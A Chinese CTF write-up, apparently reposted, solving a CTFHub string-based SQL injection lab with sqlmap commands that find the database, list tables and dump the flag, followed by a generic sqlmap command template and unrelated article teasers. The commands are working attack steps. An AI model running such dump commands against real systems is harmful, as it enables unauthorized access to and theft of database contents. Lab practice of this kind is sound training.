CTFHUB-SQL注入-字符型注入

目录

查询数据库名

查询数据库中的表名

查询表中数据

总结

此题目和上一题相似,一个是整数型注入,一个是字符型注入。字符型注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成

查询数据库名

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" --current-db

查询数据库中的表名

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

查询表中数据

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

得到了flag

总结

判断是否存在注入

python sqlmap.py -u "http://xxx/?id=1"

查看当前数据库名称

python sqlmap.py -u "http://xxx/?id=1" --current-db

查看当前数据库的表

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 --tables

查看表中的字段名

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --columns

查看表中的数据

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --dump

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/25031.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LeetCode题练习与总结:买卖股票的最佳时机--121

LeetCode题练习与总结:买卖股票的最佳时机--121

一、题目描述 给定一个数组 prices ,它的第 i 个元素 prices[i] 表示一支给定股票第 i 天的价格。 你只能选择 某一天 买入这只股票,并选择在 未来的某一个不同的日子 卖出该股票。设计一个算法来计算你所能获取的最大利润。 返回你可以从这笔交易中获…
阅读更多...
GIS数据快捷共享发布工具及操作视频

GIS数据快捷共享发布工具及操作视频

有网友反映还是不会操作GIS数据快捷共享发布工具(建立自己的地图网站),要我录个视频。 好,那就录一个: GIS数据快捷共享发布工具及操作视频 虽然默认例子是二维的,但这个服务器可以为二维、三维系统发布时间服务。都是…
阅读更多...
NASA数据集——SARAL 近实时增值业务地球物理数据记录海面高度异常

NASA数据集——SARAL 近实时增值业务地球物理数据记录海面高度异常

SARAL Near-Real-Time Value-added Operational Geophysical Data Record Sea Surface Height Anomaly SARAL 近实时增值业务地球物理数据记录海面高度异常 简介 2020 年 3 月 18 日至今 ALTIKA_SARAL_L2_OST_XOGDR 这些数据是近实时(NRT)&#xff…
阅读更多...
SpringCloudAlibaba基础二 Nacos注册中心

SpringCloudAlibaba基础二 Nacos注册中心

一 什么是 Nacos 官方:一个更易于构建云原生应用的动态服务发现(Nacos Discovery )、服务配置(Nacos Config)和服务管理平台。 集 注册中心配置中心服务管理 平台。 Nacos 的关键特性包括: 服务发现和服务健康监测动态配置服务动态 DNS 服务服务及其元数据管理 …
阅读更多...
达梦8 探寻达梦排序原理:新排序机制(SORT_FLAG=1)

达梦8 探寻达梦排序原理:新排序机制(SORT_FLAG=1)

测试版本:--03134283938-20221019-172201-20018 达梦的排序机制由四个dm.ini参数控制: #maximum sort buffer size in Megabytes ,有效值范围(1~2048) SORT_BUF_SIZE 100 #ma…
阅读更多...
mysql数据库打开失败的问题

mysql数据库打开失败的问题

打不开mysql 1. my.ini未配置路径:找到basedir和datadir,改成如下路径。改完记得去掉井号 !! 复制路径粘贴,记得去掉井号 !! 启动!方式1 发生系统错误5:没有用管理员身…
阅读更多...
Android Media Framework(三)OpenMAX API阅读与分析

Android Media Framework(三)OpenMAX API阅读与分析

这篇文章我们将聚焦Control API的功能与用法,为实现OMX Core、Component打下坚实的基础。 1、OMX_Core.h OMX Core在OpenMAX IL架构中的位置位于IL Client与实际的OMX组件之间,OMX Core提供了两组API给IL Client使用,一组API用于管理OMX组件…
阅读更多...
数据库 | 关系数据库设计

数据库 | 关系数据库设计

第七章 1.简述数据库的设计阶段?(简要回答数据库设计步骤?)((数据库设计有哪几个阶段?) 需求分析、概念结构设计、逻辑结构设计、物理结构设计、数据库的实施、数据库的运行和维护…
阅读更多...
如何用群晖当异地组网服务器?

如何用群晖当异地组网服务器?

在当今信息化时代,远程通信成为了企业和个人之间不可或缺的一部分。特别是对于跨地区的通信需求,一个可靠的异地组网服务器是必不可少的。而群晖(Synology)作为一款功能强大的网络存储设备,可以被用作办公室或家庭的异…
阅读更多...
构建LangChain应用程序的示例代码:24、使用OpenAI工具进行文本提取教程(Extraction with OpenAI Tools)

构建LangChain应用程序的示例代码:24、使用OpenAI工具进行文本提取教程(Extraction with OpenAI Tools)

使用OpenAI工具进行文本提取教程 执行提取任务从未如此简单!OpenAI的工具调用功能是完美的选择,因为它允许从文本中提取多种不同类型的元素。 使用支持工具的模型 1106版本之后的模型使用工具,并支持“并行函数调用”,这使得任…
阅读更多...
ssm621大湾区旅游推荐系统的设计与实现+vue【已测试】

ssm621大湾区旅游推荐系统的设计与实现+vue【已测试】

前言:👩‍💻 计算机行业的同仁们,大家好!作为专注于Java领域多年的开发者,我非常理解实践案例的重要性。以下是一些我认为有助于提升你们技能的资源: 👩‍💻 SpringBoot…
阅读更多...
数染色体 算法 python源码

数染色体 算法 python源码

效果图如下: 原图: 完整代码: import cv2 import numpy as np from skimage import measure import randomimage cv2.imread(113.jpg, cv2.IMREAD_GRAYSCALE)blurred_img cv2.GaussianBlur(image, (5, 5), 0)_, binary_image cv2.thresho…
阅读更多...
后端启动项目端口冲突问题解决

后端启动项目端口冲突问题解决

后端启动项目端口冲突 原因: Vindows Hyper-V虚拟化平台占用了端口。 解决方案一: 查看被占用的端口范围,然后选择一个没被占用的端口启动项目。netsh interface ipv4 show excludedportrange protocoltcp 解决方案二: 禁用H…
阅读更多...
spring源码解析-(2)Bean的包扫描

spring源码解析-(2)Bean的包扫描

包扫描的过程 测试代码: // 扫描指定包下的所有类 BeanDefinitionRegistry registry new SimpleBeanDefinitionRegistry(); // 扫描指定包下的所有类 ClassPathBeanDefinitionScanner scanner new ClassPathBeanDefinitionScanner(registry); scanner.scan(&quo…
阅读更多...
MyBatis中 set标签

MyBatis中 set标签

1、set标签特点: set标签用于更新语句中set标签解析为set关键字set可以去除跟新语句中无用的逗号通常是和if标签一起使用 2、set标签的使用 编写接口方法编写sql语句 注意 当set标签中有条件成立时就会附加set关键字,字段为null时该列不会被更新。se…
阅读更多...
域内攻击 ---> AS-REP Roasting

域内攻击 ---> AS-REP Roasting

今天,我们就来讲一下另外一种Roasting攻击 AS-REP Roasting 1.AS-REP Roasting原理 其实和kerberoasting一样,这种攻击也是一种暴力破解的攻击,完全取决于攻击者的字典。 但是不同于Kerberoasting,他不需要用户进行注册SPN&…
阅读更多...
M3ID和CD的区别

M3ID和CD的区别

M3ID的公式: CD的公式(概率空间版本): CD的公式(logits空间版本): 为简单对比,主要比较概率空间版本。logits空间版本已有证明和概率空间版本等效,在此不做详细讨论&a…
阅读更多...
Ceph入门到精通-ceph经典盘符飘逸问题处理步骤

Ceph入门到精通-ceph经典盘符飘逸问题处理步骤

在Ceph存储系统中,"盘符飘逸"通常指的是Ceph OSD(Object Storage Daemon)使用的磁盘在系统重启后没有被正确挂载或识别。这可能是由于多种原因造成的,例如磁盘连接问题、驱动问题或配置错误。以下是解决此问题的步骤: 确认磁盘状态: 使用lsblk或fdisk -l命令来…
阅读更多...
C#编码中间语言IL,也称为 MSIL 或 CIL

C#编码中间语言IL,也称为 MSIL 或 CIL

C# 是一种编译型语言,它的源代码(.cs 文件)首先被编译成中间语言(IL,也称为 MSIL 或 CIL,即 Microsoft Intermediate Language),然后这个中间语言代码通常被封装在一个程序集&#x…
阅读更多...
Linux网络 - json,网络计算服务器与客户端改进

Linux网络 - json,网络计算服务器与客户端改进

文章目录 前言一、json1.引入库2. 使用步骤2.Calculator.hpp3.Task.hpp4.serverCal.hpp 新客户端 前言 本章内容主要对上一章的网络计算器客户端和服务器进行一些Bug修正与功能改进。 并学习如何使用json库和daemon函数。 一、json 在我们自己的电脑上一些软件的文件夹中&…
阅读更多...
最新文章

Copyright @ 2022~2023